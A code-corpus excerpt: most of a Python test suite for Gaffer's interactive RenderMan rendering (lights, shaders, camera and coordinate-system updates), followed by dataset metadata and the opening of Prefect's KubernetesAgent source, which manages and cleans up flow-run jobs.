self.assertEqual( c / c[0], IECore.Color3f( 1, 0.5, 0.25 ) )
# adjust a parameter, give it time to update, and check the output
s["l"]["parameters"]["lightcolor"].setValue( IECore.Color3f( 0.25, 0.5, 1 ) )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[2], IECore.Color3f( 0.25, 0.5, 1 ) )
# pause it, adjust a parameter, wait, and check that nothing changed
s["r"]["state"].setValue( s["r"].State.Paused )
s["l"]["parameters"]["lightcolor"].setValue( IECore.Color3f( 1, 0.5, 0.25 ) )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[2], IECore.Color3f( 0.25, 0.5, 1 ) )
# unpause it, wait, and check that the update happened
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[0], IECore.Color3f( 1, 0.5, 0.25 ) )
# turn off light updates, adjust a parameter, wait, and check nothing happened
s["r"]["updateLights"].setValue( False )
s["l"]["parameters"]["lightcolor"].setValue( IECore.Color3f( 0.25, 0.5, 1 ) )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[0], IECore.Color3f( 1, 0.5, 0.25 ) )
# turn light updates back on and check that it updates
s["r"]["updateLights"].setValue( True )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[2], IECore.Color3f( 0.25, 0.5, 1 ) )
# stop the render, tweak a parameter and check that nothing happened
s["r"]["state"].setValue( s["r"].State.Stopped )
s["l"]["parameters"]["lightcolor"].setValue( IECore.Color3f( 1, 0.5, 0.25 ) )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[2], IECore.Color3f( 0.25, 0.5, 1 ) )
def testShaders( self ) :
s = Gaffer.ScriptNode()
s["p"] = GafferScene.Plane()
s["p"]["transform"]["translate"].setValue( IECore.V3f( -0.1, -0.1, 0 ) )
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 1 )
s["l"] = GafferRenderMan.RenderManLight()
s["l"].loadShader( "ambientlight" )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["p"]["out"] )
s["g"]["in1"].setInput( s["c"]["out"] )
s["g"]["in2"].setInput( s["l"]["out"] )
s["s"] = GafferRenderMan.RenderManShader()
s["s"].loadShader( "checker" )
s["s"]["parameters"]["blackcolor"].setValue( IECore.Color3f( 1, 0.5, 0.25 ) )
s["s"]["parameters"]["Ka"].setValue( 1 )
s["s"]["parameters"]["frequency"].setValue( 1 )
s["a"] = GafferScene.ShaderAssignment()
s["a"]["in"].setInput( s["g"]["out"] )
s["a"]["shader"].setInput( s["s"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlane",
}
)
)
s["d"]["in"].setInput( s["a"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c, IECore.Color3f( 1, 0.5, 0.25 ) )
# adjust a shader parameter, wait, and check that it changed
s["s"]["parameters"]["blackcolor"].setValue( IECore.Color3f( 1, 1, 1 ) )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c, IECore.Color3f( 1 ) )
# turn off shader updates, do the same, and check that it hasn't changed
s["r"]["updateShaders"].setValue( False )
s["s"]["parameters"]["blackcolor"].setValue( IECore.Color3f( 0.5 ) )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c, IECore.Color3f( 1 ) )
# turn shader updates back on, and check that it updates
s["r"]["updateShaders"].setValue( True )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c, IECore.Color3f( 0.5 ) )
def testScopesDontLeak( self ) :
s = Gaffer.ScriptNode()
s["p"] = GafferScene.Plane()
s["p"]["transform"]["translate"].setValue( IECore.V3f( -0.6, -0.1, 0 ) )
s["p1"] = GafferScene.Plane()
s["p1"]["transform"]["translate"].setValue( IECore.V3f( 0.6, 0.1, 0 ) )
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 2 )
s["l"] = GafferRenderMan.RenderManLight()
s["l"].loadShader( "ambientlight" )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["p"]["out"] )
s["g"]["in1"].setInput( s["p1"]["out"] )
s["g"]["in2"].setInput( s["c"]["out"] )
s["g"]["in3"].setInput( s["l"]["out"] )
s["s"] = GafferRenderMan.RenderManShader()
s["s"].loadShader( "checker" )
s["s"]["parameters"]["blackcolor"].setValue( IECore.Color3f( 1, 0, 0 ) )
s["s"]["parameters"]["Ka"].setValue( 1 )
s["s"]["parameters"]["frequency"].setValue( 1 )
s["f"] = GafferScene.PathFilter()
s["f"]["paths"].setValue( IECore.StringVectorData( [ "/group/plane" ] ) )
s["a"] = GafferScene.ShaderAssignment()
s["a"]["in"].setInput( s["g"]["out"] )
s["a"]["shader"].setInput( s["s"]["out"] )
s["a"]["filter"].setInput( s["f"]["match"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlanes",
}
)
)
s["d"]["in"].setInput( s["a"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["options"]["renderResolution"]["value"].setValue( IECore.V2i( 512 ) )
s["o"]["options"]["renderResolution"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output.
# we should have a red plane on the left, and a facing ratio
# shaded plane on the right, because we attached no shader to the
# second plane.
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlanes" ),
IECore.V2f( 0.25, 0.5 ),
)
self.assertEqual( c, IECore.Color3f( 1, 0, 0 ) )
c1 = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlanes" ),
IECore.V2f( 0.75, 0.5 ),
)
self.assertTrue( c1[0] > 0.9 )
self.assertEqual( c1[0], c1[1] )
self.assertEqual( c1[0], c1[2] )
# adjust a shader parameter, wait, and check that the plane
# on the left changed. check that the plane on the right didn't
# change at all.
s["s"]["parameters"]["blackcolor"].setValue( IECore.Color3f( 0, 1, 0 ) )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlanes" ),
IECore.V2f( 0.25, 0.5 ),
)
self.assertEqual( c, IECore.Color3f( 0, 1, 0 ) )
c1 = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlanes" ),
IECore.V2f( 0.75, 0.5 ),
)
self.assertTrue( c1[0] > 0.9 )
self.assertEqual( c1[0], c1[1] )
self.assertEqual( c1[0], c1[2] )
def testContext( self ):
s = Gaffer.ScriptNode()
r = GafferRenderMan.InteractiveRenderManRender()
self.assertNotEqual( r.getContext(), None )
self.failIf( r.getContext().isSame( s.context() ) )
s["r"] = r
self.failUnless( r.getContext().isSame( s.context() ) )
s.removeChild( r )
self.failIf( r.getContext().isSame( s.context() ) )
def testAddLight( self ) :
s = Gaffer.ScriptNode()
s["l"] = GafferRenderMan.RenderManLight()
s["l"].loadShader( "pointlight" )
s["l"]["parameters"]["lightcolor"].setValue( IECore.Color3f( 1, 0, 0 ) )
s["l"]["transform"]["translate"]["z"].setValue( 1 )
s["p"] = GafferScene.Plane()
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 1 )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["l"]["out"] )
s["g"]["in1"].setInput( s["p"]["out"] )
s["g"]["in2"].setInput( s["c"]["out"] )
s["s"] = GafferRenderMan.RenderManShader()
s["s"].loadShader( "matte" )
s["a"] = GafferScene.ShaderAssignment()
s["a"]["in"].setInput( s["g"]["out"] )
s["a"]["shader"].setInput( s["s"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlane",
}
)
)
s["d"]["in"].setInput( s["a"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[0], IECore.Color3f( 1, 0, 0 ) )
# add a light
s["l2"] = GafferRenderMan.RenderManLight()
s["l2"].loadShader( "pointlight" )
s["l2"]["parameters"]["lightcolor"].setValue( IECore.Color3f( 0, 1, 0 ) )
s["l2"]["transform"]["translate"]["z"].setValue( 1 )
s["g"]["in3"].setInput( s["l2"]["out"] )
# give it time to update, and check the output
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[0], IECore.Color3f( 1, 1, 0 ) )
def testRemoveLight( self ) :
s = Gaffer.ScriptNode()
s["l"] = GafferRenderMan.RenderManLight()
s["l"].loadShader( "pointlight" )
s["l"]["transform"]["translate"]["z"].setValue( 1 )
s["p"] = GafferScene.Plane()
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 1 )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["l"]["out"] )
s["g"]["in1"].setInput( s["p"]["out"] )
s["g"]["in2"].setInput( s["c"]["out"] )
s["s"] = GafferRenderMan.RenderManShader()
s["s"].loadShader( "matte" )
s["a"] = GafferScene.ShaderAssignment()
s["a"]["in"].setInput( s["g"]["out"] )
s["a"]["shader"].setInput( s["s"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlane",
}
)
)
s["d"]["in"].setInput( s["a"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertNotEqual( c[0], 0.0 )
# remove the light by disabling it
s["l"]["enabled"].setValue( False )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c[0], 0.0 )
# enable it again
s["l"]["enabled"].setValue( True )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertNotEqual( c[0], 0.0 )
def testHideLight( self ) :
s = Gaffer.ScriptNode()
s["l"] = GafferRenderMan.RenderManLight()
s["l"].loadShader( "pointlight" )
s["l"]["transform"]["translate"]["z"].setValue( 1 )
s["v"] = GafferScene.StandardAttributes()
s["v"]["attributes"]["visibility"]["enabled"].setValue( True )
s["v"]["in"].setInput( s["l"]["out"] )
s["p"] = GafferScene.Plane()
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 1 )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["v"]["out"] )
s["g"]["in1"].setInput( s["p"]["out"] )
s["g"]["in2"].setInput( s["c"]["out"] )
s["s"] = GafferRenderMan.RenderManShader()
s["s"].loadShader( "matte" )
s["a"] = GafferScene.ShaderAssignment()
s["a"]["in"].setInput( s["g"]["out"] )
s["a"]["shader"].setInput( s["s"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlane",
}
)
)
s["d"]["in"].setInput( s["a"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertNotEqual( c[0], 0.0 )
# remove the light by hiding it
s["v"]["attributes"]["visibility"]["value"].setValue( False )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c[0], 0.0 )
# put the light back by showing it
s["v"]["attributes"]["visibility"]["value"].setValue( True )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertNotEqual( c[0], 0.0 )
def testRenderingDuringScriptDeletion( self ) :
s = Gaffer.ScriptNode()
s["p"] = GafferScene.Plane()
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 1 )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["p"]["out"] )
s["g"]["in1"].setInput( s["c"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"driverType" : "ClientDisplayDriver",
"displayHost" : "localhost",
"displayPort" : "1559",
"remoteDisplayType" : "GafferImage::GafferDisplayDriver",
"quantize" : IECore.IntVectorData( [ 0, 0, 0, 0 ] ),
}
)
)
s["d"]["in"].setInput( s["g"]["out"] )
s["m"] = GafferImage.Display()
# connect a python function to the Display node image and data
# received signals. this emulates what the UI does.
def __displayCallback( plug ) :
pass
c = (
s["m"].imageReceivedSignal().connect( __displayCallback ),
s["m"].dataReceivedSignal().connect( __displayCallback ),
)
s["o"] = GafferScene.StandardOptions()
s["o"]["in"].setInput( s["d"]["out"] )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/plane" )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 1 )
# delete the script while the render is still progressing. when
# this occurs, deletion of the render node will be triggered, which
# will in turn stop the render. this may flush data to the display,
# in which case it will emit its data and image received signals
# on a separate thread. if we're still holding the gil on the main
# thread when this happens, we'll get a deadlock.
del s
def testMoveCamera( self ) :
s = Gaffer.ScriptNode()
s["p"] = GafferScene.Plane()
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 1 )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["p"]["out"] )
s["g"]["in1"].setInput( s["c"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlane",
}
)
)
s["d"]["in"].setInput( s["g"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertAlmostEqual( c[1], 1, delta = 0.001 )
# move the camera so it can't see the plane, and check the output
s["c"]["transform"]["translate"]["x"].setValue( 2 )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertAlmostEqual( c[0], 0 )
# move the camera back and recheck
s["c"]["transform"]["translate"]["x"].setValue( 0 )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertAlmostEqual( c[1], 1, delta = 0.001 )
def testMoveCoordinateSystem( self ) :
shader = self.compileShader( os.path.dirname( __file__ ) + "/shaders/coordSysDot.sl" )
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["shader"] = GafferRenderMan.RenderManShader()
s["shader"].loadShader( shader )
s["shader"]["parameters"]["coordSys"].setValue( "/group/coordinateSystem" )
s["shaderAssignment"] = GafferScene.ShaderAssignment()
s["shaderAssignment"]["in"].setInput( s["plane"]["out"] )
s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )
s["camera"] = GafferScene.Camera()
s["camera"]["transform"]["translate"]["z"].setValue( 1 )
s["coordSys"] = GafferScene.CoordinateSystem()
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["shaderAssignment"]["out"] )
s["g"]["in1"].setInput( s["camera"]["out"] )
s["g"]["in2"].setInput( s["coordSys"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlane",
}
)
)
s["d"]["in"].setInput( s["g"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertAlmostEqual( c[1], 1, delta = 0.001 )
# move the coordinate system, and check the output
s["coordSys"]["transform"]["translate"]["x"].setValue( 0.1 )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.6, 0.5 ),
)
self.assertAlmostEqual( c[0], 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.6, 0.7 ),
)
self.assertAlmostEqual( c[0], 0 )
# scale the coordinate system to cover everything, and check again
s["coordSys"]["transform"]["scale"].setValue( IECore.V3f( 100 ) )
time.sleep( 2 )
for p in [
IECore.V2f( 0.5 ),
IECore.V2f( 0.1 ),
IECore.V2f( 0.9 ),
] :
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
p,
)
self.assertAlmostEqual( c[0], 1, delta = 0.001 )
if __name__ == "__main__":
unittest.main()
| 28.826281
| 88
| 0.601792
|
60eafdc2219ed8c18cbf6702cdd2feefe764ddf2
| 32,766
|
py
|
Python
|
src/prefect/agent/kubernetes/agent.py
|
jackdesert/prefect
|
8ff23d50b5488a0bf7eea19ed7ee5fe660819640
|
[
"Apache-2.0"
] | null | null | null |
src/prefect/agent/kubernetes/agent.py
|
jackdesert/prefect
|
8ff23d50b5488a0bf7eea19ed7ee5fe660819640
|
[
"Apache-2.0"
] | null | null | null |
src/prefect/agent/kubernetes/agent.py
|
jackdesert/prefect
|
8ff23d50b5488a0bf7eea19ed7ee5fe660819640
|
[
"Apache-2.0"
] | null | null | null |
import os
import time
import uuid
from typing import Iterable, List, Any
import json
import yaml
import prefect
from prefect import config
from prefect.agent import Agent
from prefect.engine.state import Failed
from prefect.run_configs import KubernetesRun
from prefect.utilities.agent import get_flow_image, get_flow_run_command
from prefect.utilities.filesystems import read_bytes_from_path
from prefect.utilities.graphql import GraphQLResult
DEFAULT_JOB_TEMPLATE_PATH = os.path.join(os.path.dirname(__file__), "job_template.yaml")
def _get_or_create(d: dict, key: str, val: Any = None) -> Any:
"""Get a (possibly nested) field from a dict, creating intermediate values
if needed."""
if val is None:
val = {}
path = key.split(".")
for k in path[:-1]:
d = d.setdefault(k, {})
return d.setdefault(path[-1], val)
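# Hedged example of the helper above (values are illustrative only):
#     d = {}
#     _get_or_create(d, "spec.template.metadata.labels")
#     # d is now {"spec": {"template": {"metadata": {"labels": {}}}}}
#     _get_or_create(d, "spec.template.spec.containers", [])  # returns (and stores) []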
class KubernetesAgent(Agent):
"""
Agent which deploys flow runs as Kubernetes jobs. The agent must currently run either
on a k8s cluster or on a local machine where the kube_config points at the
desired cluster. Information on using the Kubernetes Agent can be found at
https://docs.prefect.io/orchestration/agents/kubernetes.html
Environment variables may be set on the agent to be provided to each flow run's job:
```
prefect agent kubernetes start --env MY_SECRET_KEY=secret --env OTHER_VAR=$OTHER_VAR
```
These can also be used to control the k8s job spec that describes the flow run jobs.
For example, to set the k8s secret used to pull images from a non-public registry:
```
prefect agent kubernetes start --env IMAGE_PULL_SECRETS=my-img-pull-secret
```
For details on the available environment variables for customizing the job spec,
see `help(KubernetesAgent.generate_job_spec_from_environment)`.
Specifying a namespace for the agent will create flow run jobs in that namespace:
```
prefect agent kubernetes start --namespace dev
```
Args:
- agent_config_id (str, optional): An optional agent configuration ID that can be used to set
configuration based on an agent from a backend API. If set all configuration values will be
pulled from backend agent configuration.
- namespace (str, optional): A Kubernetes namespace to create jobs in. Defaults
to the environment variable `NAMESPACE` or `default`.
- job_template_path (str, optional): A path to a job template file to use instead
of the default.
- name (str, optional): An optional name to give this agent. Can also be set through
the environment variable `PREFECT__CLOUD__AGENT__NAME`. Defaults to "agent"
- labels (List[str], optional): a list of labels, which are arbitrary string
identifiers used by Prefect Agents when polling for work
- env_vars (dict, optional): a dictionary of environment variables and values that will
be set on each flow run that this agent submits for execution and in the agent's
own environment
- max_polls (int, optional): maximum number of times the agent will poll Prefect Cloud
for flow runs; defaults to infinite
- agent_address (str, optional): Address to serve internal API at. Currently this is
just health checks for use by an orchestration layer. Leave blank for no API server
(default).
- no_cloud_logs (bool, optional): Disable logging to a Prefect backend for this agent
and all deployed flow runs
- volume_mounts (list, optional): A list of volumeMounts to mount when a job is
run. The volumeMounts in the list should be specified as dicts
i.e `[{"name": "my-vol", "mountPath": "/mnt/my-mount"}]`
- volumes (list, optional): A list of volumes to make available to be mounted when a
job is run. The volumes in the list should be specified as nested dicts.
i.e `[{"name": "my-vol", "csi": {"driver": "secrets-store.csi.k8s.io"}}]`
"""
def __init__(
self,
agent_config_id: str = None,
namespace: str = None,
job_template_path: str = None,
name: str = None,
labels: Iterable[str] = None,
env_vars: dict = None,
max_polls: int = None,
agent_address: str = None,
no_cloud_logs: bool = False,
volume_mounts: List[dict] = None,
volumes: List[dict] = None,
) -> None:
super().__init__(
agent_config_id=agent_config_id,
name=name,
labels=labels,
env_vars=env_vars,
max_polls=max_polls,
agent_address=agent_address,
no_cloud_logs=no_cloud_logs,
)
self.namespace = namespace or os.getenv("NAMESPACE", "default")
self.job_template_path = job_template_path or DEFAULT_JOB_TEMPLATE_PATH
self.volume_mounts = volume_mounts
self.volumes = volumes
from kubernetes import client, config
try:
self.logger.debug("Loading incluster configuration")
config.load_incluster_config()
except config.config_exception.ConfigException as exc:
self.logger.warning(
"{} Using out of cluster configuration option.".format(exc)
)
self.logger.debug("Loading out of cluster configuration")
config.load_kube_config()
self.batch_client = client.BatchV1Api()
self.core_client = client.CoreV1Api()
self.k8s_client = client
self.logger.debug(f"Namespace: {self.namespace}")
def manage_jobs(self) -> None:
"""
This function checks whether jobs are `Failed` or `Succeeded` and, if so, deletes them
from the namespace. If one of a job's pods happens to run into image-pull errors,
the flow run is marked as failed and the job is still deleted.
"""
self.logger.debug(
"Retrieving information of jobs that are currently in the cluster..."
)
more = True
_continue = ""
while more:
try:
jobs = self.batch_client.list_namespaced_job(
namespace=self.namespace,
label_selector="prefect.io/identifier",
limit=20,
_continue=_continue,
)
_continue = jobs.metadata._continue
more = bool(_continue)
for job in jobs.items:
delete_job = job.status.failed or job.status.succeeded
job_name = job.metadata.name
flow_run_id = job.metadata.labels.get("prefect.io/flow_run_id")
# Check for pods that are stuck with image pull errors
if not delete_job:
pods = self.core_client.list_namespaced_pod(
namespace=self.namespace,
label_selector="prefect.io/identifier={}".format(
job.metadata.labels.get("prefect.io/identifier")
),
)
for pod in pods.items:
if pod.status.container_statuses:
for container_status in pod.status.container_statuses:
waiting = container_status.state.waiting
if waiting and (
waiting.reason == "ErrImagePull"
or waiting.reason == "ImagePullBackOff"
):
self.logger.debug(
f"Failing flow run {flow_run_id} due to pod {waiting.reason}"
)
self.client.set_flow_run_state(
flow_run_id=flow_run_id,
state=Failed(
message="Kubernetes Error: {}".format(
container_status.state.waiting.message
)
),
)
delete_job = True
break
# Report failed pods
if job.status.failed:
pods = self.core_client.list_namespaced_pod(
namespace=self.namespace,
label_selector="prefect.io/identifier={}".format(
job.metadata.labels.get("prefect.io/identifier")
),
)
failed_pods = []
for pod in pods.items:
if pod.status.phase != "Failed":
continue
# Format pod failure error message
failed_pods.append(pod.metadata.name)
pod_status_logs = [f"Pod {pod.metadata.name} failed."]
for status in pod.status.container_statuses:
state = (
"running"
if status.state.running
else "waiting"
if status.state.waiting
else "terminated"
if status.state.terminated
else "Not Found"
)
pod_status_logs.append(
f"\tContainer '{status.name}' state: {state}"
)
if status.state.terminated:
pod_status_logs.append(
f"\t\tExit Code:: {status.state.terminated.exit_code}"
)
if status.state.terminated.message:
pod_status_logs.append(
f"\t\tMessage: {status.state.terminated.message}"
)
if status.state.terminated.reason:
pod_status_logs.append(
f"\t\tReason: {status.state.terminated.reason}"
)
if status.state.terminated.signal:
pod_status_logs.append(
f"\t\tSignal: {status.state.terminated.signal}"
)
# Send pod failure information to flow run logs
self.client.write_run_logs(
[
dict(
flow_run_id=flow_run_id,
name=self.name,
message="\n".join(pod_status_logs),
level="ERROR",
)
]
)
# If there are failed pods and the run is not finished, fail the run
if (
failed_pods
and not self.client.get_flow_run_state(
flow_run_id
).is_finished()
):
self.logger.debug(
f"Failing flow run {flow_run_id} due to the failed pods {failed_pods}"
)
self.client.set_flow_run_state(
flow_run_id=flow_run_id,
state=Failed(
message="Kubernetes Error: pods {} failed for this job".format(
failed_pods
)
),
)
# Delete job if it is successful or failed
if delete_job:
self.logger.debug(f"Deleting job {job_name}")
try:
self.batch_client.delete_namespaced_job(
name=job_name,
namespace=self.namespace,
body=self.k8s_client.V1DeleteOptions(
propagation_policy="Foreground"
),
)
except self.k8s_client.rest.ApiException as exc:
if exc.status != 404:
self.logger.error(
f"{exc.status} error attempting to delete job {job_name}"
)
except self.k8s_client.rest.ApiException as exc:
if exc.status == 410:
self.logger.debug("Refreshing job listing token...")
_continue = ""
continue
else:
self.logger.debug(exc)
def heartbeat(self) -> None:
"""
Check status of jobs created by this agent, delete completed jobs and failed containers.
"""
